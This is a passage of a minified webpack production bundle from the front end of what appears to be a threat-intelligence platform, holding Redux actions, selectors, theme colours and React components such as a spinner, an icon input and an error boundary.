    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["a" /* FETCH_TRIAGE_REPORTS */],
    payload: payload
  };
};

var fetchTriageReportsSuccess = function fetchTriageReportsSuccess(reports) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["d" /* FETCH_TRIAGE_REPORTS_SUCCESS */],
    payload: reports
  };
};

var fetchTriageReportsFailure = function fetchTriageReportsFailure(error) {
  var errorMessage = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 'Error fetching Triage Reports';
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["c" /* FETCH_TRIAGE_REPORTS_FAILURE */],
    payload: error,
    error: true,
    meta: { type: 'error', errorMessage: errorMessage }
  };
};

// TODO Add payload / query types
var fetchTriageReportsAndEnrich = function fetchTriageReportsAndEnrich(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["b" /* FETCH_TRIAGE_REPORTS_AND_ENRICH */],
    payload: payload
  };
};

var resetPage = function resetPage() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["e" /* RESET_PAGE */]
  };
};

/***/ }),
/* 1471 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "notificationPreferences", function() { return notificationPreferences; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "activity", function() { return activity; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "activitySummary", function() { return activitySummary; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "watchedKeywords", function() { return watchedKeywords; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "watchedKeywordsLoading", function() { return watchedKeywordsLoading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "globalEmailEnabled", function() { return globalEmailEnabled; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "newReportEmailEnabled", function() { return newReportEmailEnabled; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "dailySummaryEnabled", function() { return dailySummaryEnabled; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "weeklySummaryEnabled", function() { return weeklySummaryEnabled; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);


var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['notificationPreferences', 'loading']);
var notificationPreferences = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['notificationPreferences', 'notificationPreferences']);
var activity = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['notificationPreferences', 'settings', 'activity']);
var activitySummary = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['notificationPreferences', 'settings', 'activitySummary']);
var watchedKeywords = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['notificationPreferences', 'watchedKeywords']);
var watchedKeywordsLoading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['notificationPreferences', 'watchedKeywordsLoading']);

var globalEmailEnabled = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['notificationPreferences', 'notificationPreferences', 'activity', 'global', 'emailEnabled']);
var newReportEmailEnabled = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['notificationPreferences', 'notificationPreferences', 'activity', 'newReport', 'emailEnabled']);
var dailySummaryEnabled = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['notificationPreferences', 'notificationPreferences', 'activitySummary', 'dailyEnabled']);
var weeklySummaryEnabled = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['notificationPreferences', 'notificationPreferences', 'activitySummary', 'weeklyEnabled']);

/***/ }),
/* 1472 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saved", function() { return saved; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "shared", function() { return shared; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "filters", function() { return filters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "savedAnalyses", function() { return savedAnalyses; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sharedAnalyses", function() { return sharedAnalyses; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "analysis", function() { return analysis; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "analysisMap", function() { return analysisMap; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_utils_utils_js__ = __webpack_require__(78);






var saved = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['analyses', 'saved']);

var shared = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['analyses', 'shared']);

var filters = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['analysesMeta', 'filters']);

var loading = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['analysesMeta', 'loading']);

var savedAnalyses = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])(saved, function (analyses) {
  return analyses.sort(Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils_utils_js__["sortBy"])('created', 'ASC')).toList();
});

var sharedAnalyses = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])(shared, function (analyses) {
  return analyses.sort(Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils_utils_js__["sortBy"])('created', 'ASC')).toList();
});

var analysis = function analysis(guid) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([saved, shared], function (saved, shared) {
    // Why do we simply return a Map with a title property? What about all
    // the other properties???
    if (shared.get(guid)) {
      return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])({ 'title': shared.getIn([guid, 'title']) });
    }

    return saved.get(guid);
  });
};

var analysisMap = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([saved, shared, filters], function (saved, shared, filters) {
  var result = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])();
  if (filters.size === 0) {
    return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])();
  } else if (filters.size === 2) {
    result = saved.merge(shared);
  } else if (filters.includes('saved')) {
    result = saved;
  } else if (filters.includes('shared')) {
    result = shared;
  }
  return result.sort(Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils_utils_js__["sortBy"])('created', 'ASC')).toList();
});

/***/ }),
/* 1473 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return InputWithIcon; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames__ = __webpack_require__(85);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__InputWithIcon_styl__ = __webpack_require__(3443);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__InputWithIcon_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2__InputWithIcon_styl__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }






/**
 * TODO:
 * Not sure what I think of the className API i've created here. Specifying
 * <InputWithIcon className={...} /> actually sets the class on the top level
 * element. This seems fine, but it is also in contrast to passing all other
 * native props down through to the actual input.
 */


var InputWithIcon = function (_React$Component) {
  _inherits(InputWithIcon, _React$Component);

  function InputWithIcon() {
    _classCallCheck(this, InputWithIcon);

    return _possibleConstructorReturn(this, (InputWithIcon.__proto__ || Object.getPrototypeOf(InputWithIcon)).apply(this, arguments));
  }

  _createClass(InputWithIcon, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          icon = _props.icon,
          className = _props.className,
          childProps = _objectWithoutProperties(_props, ['icon', 'className']);

      var classes = __WEBPACK_IMPORTED_MODULE_1_classnames___default()(className, __WEBPACK_IMPORTED_MODULE_2__InputWithIcon_styl___default.a.InputWithIcon, 'InputWithIcon');
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { className: classes },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'label',
          { htmlFor: this.props.id },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { className: __WEBPACK_IMPORTED_MODULE_1_classnames___default()('fa', icon) })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('input', childProps)
      );
    }
  }]);

  return InputWithIcon;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/***/ }),
/* 1474 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

var _propTypes = __webpack_require__(3454);

var _propTypes2 = _interopRequireDefault(_propTypes);

var _react = __webpack_require__(0);

var _react2 = _interopRequireDefault(_react);

var _classnames = __webpack_require__(85);

var _classnames2 = _interopRequireDefault(_classnames);

var _objectAssign = __webpack_require__(22);

var _objectAssign2 = _interopRequireDefault(_objectAssign);

var _spinners = __webpack_require__(3457);

function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; }

function _toConsumableArray(arr) { if (Array.isArray(arr)) { for (var i = 0, arr2 = Array(arr.length); i < arr.length; i++) { arr2[i] = arr[i]; } return arr2; } else { return Array.from(arr); } }

function _defineProperty(obj, key, value) { if (key in obj) { Object.defineProperty(obj, key, { value: value, enumerable: true, configurable: true, writable: true }); } else { obj[key] = value; } return obj; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; } // eslint-disable-line import/no-extraneous-dependencies


if (!Object({"SERVICES_APTRINSIC_ENABLED":true,"SERVICES_NEW_RELIC_ENABLED":false,"SERVICES_SENTRY_ENABLED":true,"NODE_ENV":"production","ENV":"production","TRUSTAR_API_HOST":undefined,"TRUSTAR_STATION_HOST":undefined,"SPLIT_AUTHORIZATION_KEY":"7iki1574js01dvm0oq3kaaj3755bj02lgaeo","__VERSION__":"v5.2.3-23-gdec5e66"}).REACT_SPINKIT_NO_STYLES) {
  /* eslint-disable global-require */
  __webpack_require__(3458);
  __webpack_require__(3459);
  __webpack_require__(3460);
  __webpack_require__(3461);
  __webpack_require__(3462);
  __webpack_require__(3463);
  __webpack_require__(3464);
  __webpack_require__(3465);
  __webpack_require__(3466);
  __webpack_require__(3467);
  __webpack_require__(3468);
  __webpack_require__(3469);
  __webpack_require__(3470);
  __webpack_require__(3471);
  __webpack_require__(3472);
  /* eslint-enable global-require */
}

var noFadeInWarning = "Deprecation Warning (react-spinkit): noFadeIn prop should be replaced with fadeIn='none'";

var Spinner = function (_React$Component) {
  _inherits(Spinner, _React$Component);

  function Spinner(props) {
    _classCallCheck(this, Spinner);

    if (props.noFadeIn) {
      console.warn(noFadeInWarning); // eslint-disable-line no-console
    }

    var _this = _possibleConstructorReturn(this, (Spinner.__proto__ || Object.getPrototypeOf(Spinner)).call(this, props));

    _this.displayName = 'SpinKit';
    return _this;
  }

  _createClass(Spinner, [{
    key: 'render',
    value: function render() {
      var _cx;

      var spinnerInfo = _spinners.allSpinners[this.props.name] || _spinners.allSpinners['three-bounce'];
      var classes = (0, _classnames2.default)((_cx = {
        'sk-fade-in': this.props.fadeIn === 'full' && !this.props.noFadeIn,
        'sk-fade-in-half-second': this.props.fadeIn === 'half' && !this.props.noFadeIn,
        'sk-fade-in-quarter-second': this.props.fadeIn === 'quarter' && !this.props.noFadeIn,
        'sk-spinner': !this.props.overrideSpinnerClassName
      }, _defineProperty(_cx, this.props.overrideSpinnerClassName, !!this.props.overrideSpinnerClassName), _defineProperty(_cx, this.props.className, !!this.props.className), _defineProperty(_cx, spinnerInfo.className || this.props.name, true), _cx));

      var props = (0, _objectAssign2.default)({}, this.props);
      delete props.name;
      delete props.fadeIn;
      delete props.noFadeIn;
      delete props.overrideSpinnerClassName;
      delete props.className;

      if (this.props.color) {
        props.style = props.style ? _extends({}, props.style, { color: this.props.color }) : { color: this.props.color };
      }

      return _react2.default.createElement(
        'div',
        _extends({}, props, { className: classes }),
        [].concat(_toConsumableArray(Array(spinnerInfo.divCount))).map(function (_, idx) {
          return _react2.default.createElement('div', { key: idx });
        })
      );
    }
  }]);

  return Spinner;
}(_react2.default.Component);

Spinner.propTypes = {
  name: _propTypes2.default.string.isRequired,
  noFadeIn: _propTypes2.default.bool,
  fadeIn: _propTypes2.default.oneOf(['full', 'half', 'quarter', 'none']),
  overrideSpinnerClassName: _propTypes2.default.string,
  className: _propTypes2.default.string,
  color: _propTypes2.default.string
};

Spinner.defaultProps = {
  name: 'three-bounce',
  noFadeIn: false,
  fadeIn: 'full',
  overrideSpinnerClassName: ''
};

module.exports = Spinner;

/***/ }),
/* 1475 */,
/* 1476 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "PRIMARY", function() { return PRIMARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SECONDARY", function() { return SECONDARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TERTIARY", function() { return TERTIARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BRAND_PRIMARY", function() { return BRAND_PRIMARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BRAND_SECONDARY", function() { return BRAND_SECONDARY; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SUCCESS", function() { return SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "INFO", function() { return INFO; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WARNING", function() { return WARNING; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DANGER", function() { return DANGER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LIGHT", function() { return LIGHT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DARK", function() { return DARK; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CONTRAST", function() { return CONTRAST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BLACK", function() { return BLACK; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WHITE", function() { return WHITE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TEXT", function() { return TEXT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "TEXT_INVERSE", function() { return TEXT_INVERSE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LINK_TEXT", function() { return LINK_TEXT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE", function() { return SURFACE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DARK_SURFACE_LIGHTER", function() { return DARK_SURFACE_LIGHTER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE_INVERSE", function() { return SURFACE_INVERSE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE_LIGHTER", function() { return SURFACE_LIGHTER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SURFACE_LIGHTEST", function() { return SURFACE_LIGHTEST; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "INPUT_DISABLED", function() { return INPUT_DISABLED; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BOX_SHADOW", function() { return BOX_SHADOW; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "BORDER", function() { return BORDER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LIGHT_GRAY_SURFACE", function() { return LIGHT_GRAY_SURFACE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_RESULTS", function() { return SEARCH_RESULTS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_BAR", function() { return SEARCH_BAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_BAR_INPUT", function() { return SEARCH_BAR_INPUT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_FILTER_BAR", function() { return SEARCH_FILTER_BAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SEARCH_FILTER_BAR_BUTTON", function() { return SEARCH_FILTER_BAR_BUTTON; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIDE_NAV_BAR", function() { return SIDE_NAV_BAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIDE_NAV_BAR_HOVER", function() { return SIDE_NAV_BAR_HOVER; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SIDE_NAV_DROPRIGHT_MENU_ITEM", function() { return SIDE_NAV_DROPRIGHT_MENU_ITEM; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SETTINGS_PAGE_NAVLINK", function() { return SETTINGS_PAGE_NAVLINK; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__common_colorNames__ = __webpack_require__(207);


var PRIMARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"];
var SECONDARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];
var TERTIARY = Object.assign({}, __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["WHITE"], {
  buttonText: PRIMARY.hex
}); // Tertiary is always white button blue background
var BRAND_PRIMARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"];
var BRAND_SECONDARY = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATOMIC_TANGERINE"];
var SUCCESS = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["GREEN_LEAF"];
var INFO = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["HAVELOCK_BLUE"];
var WARNING = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["BUTTERCUP"];
var DANGER = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MONZA"];
var LIGHT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var DARK = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["FJORD"];
var CONTRAST = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["FJORD"];
var BLACK = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["BLACK"];
var WHITE = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["WHITE"];
var TEXT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["FJORD"];
var TEXT_INVERSE = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["WHITE"];
var LINK_TEXT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"];
var SURFACE = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["WHITE"];
var DARK_SURFACE_LIGHTER = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["TUNDORA"];
var SURFACE_INVERSE = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var SURFACE_LIGHTER = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["WHITE"];
var SURFACE_LIGHTEST = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["WHITE"];
var INPUT_DISABLED = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var BOX_SHADOW = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var BORDER = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var LIGHT_GRAY_SURFACE = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];

/* -------------- Component Specific Styles -------------- */

// Search / Reports / Entities Page
var SEARCH_RESULTS = {
  TITLE: __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["MARINER"].X700
};

var SEARCH_BAR = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var SEARCH_BAR_INPUT = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var SEARCH_FILTER_BAR = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["ATHENS_GRAY"];
var SEARCH_FILTER_BAR_BUTTON = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];

// Side Nav Remains Black in Default
var SIDE_NAV_BAR = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["THUNDER"];
var SIDE_NAV_BAR_HOVER = __WEBPACK_IMPORTED_MODULE_0__common_colorNames__["TUNDORA"];

// Main Nav Bar
var SIDE_NAV_DROPRIGHT_MENU_ITEM = {
  BACKGROUND: SURFACE.hex,
  BACKGROUND_HOVER: BLACK.X50,
  TEXT: TEXT.hex,
  TEXT_HOVER: TEXT.hex,
  SHADOW: BLACK.X200,
  BORDER_RIGHT: TEXT.hex
};

var SETTINGS_PAGE_NAVLINK = SIDE_NAV_DROPRIGHT_MENU_ITEM;

/***/ }),
/* 1477 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Config", function() { return Config; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__themeColors__ = __webpack_require__(3493);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "ThemeColors", function() { return __WEBPACK_IMPORTED_MODULE_0__themeColors__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__common_colorNames__ = __webpack_require__(207);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "ColorNames", function() { return __WEBPACK_IMPORTED_MODULE_1__common_colorNames__; });





var Config = {
  name: 'Dark Theme',
  className: 'trustar-dark'
};

/***/ }),
/* 1478 */,
/* 1479 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return renderPortal; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_dom__ = __webpack_require__(65);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_dom___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react_dom__);

// $FlowIssue: this will be resolved when we upgrade flow. React defs are out of date


/**
 * A simple helper to avoid hardcoding the selector for the portal target in
 * various parts of the app.
 */
var renderPortal = function renderPortal(component) {
  var target = document.querySelector('#portalTarget');

  // Just in case the App itself hasn't rendered yet.
  if (!target) {
    console.warn('[WARN] Portal target not found.');
    return null;
  }

  return Object(__WEBPACK_IMPORTED_MODULE_1_react_dom__["createPortal"])(component, target);
};

/***/ }),
/* 1480 */,
/* 1481 */,
/* 1482 */,
/* 1483 */,
/* 1484 */,
/* 1485 */,
/* 1486 */
/***/ (function(module, exports) {

// removed by extract-text-webpack-plugin

/***/ }),
/* 1487 */,
/* 1488 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ErrorBoundary; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }



var getInitialState = function getInitialState() {
  return { error: null, errorInfo: null };
};

var ErrorBoundary = function (_React$Component) {
  _inherits(ErrorBoundary, _React$Component);

  function ErrorBoundary() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, ErrorBoundary);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = ErrorBoundary.__proto__ || Object.getPrototypeOf(ErrorBoundary)).call.apply(_ref, [this].concat(args))), _this), _this.state = getInitialState(), _this.renderDefaultFallback = function () {
      var _this$state = _this.state,
          error = _this$state.error,
          errorInfo = _this$state.errorInfo;

      var errProps = {};

      if (_this.props.style) errProps.style = _this.props.style;
      if (_this.props.className) errProps.className = _this.props.className;

      var details = null;

      if (false) {
        details = React.createElement(
          'details',
          { style: { whiteSpace: 'pre-wrap' } },
          error && error.toString(),
          React.createElement('br', null),
          errorInfo && errorInfo.componentStack
        );
      }

      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'div',
        errProps,
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'h2',
          null,
          'Something went wrong...'
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'p',
          null,
          'We\'ve been notified that this happened and will investigate.'
        ),
        details
      );
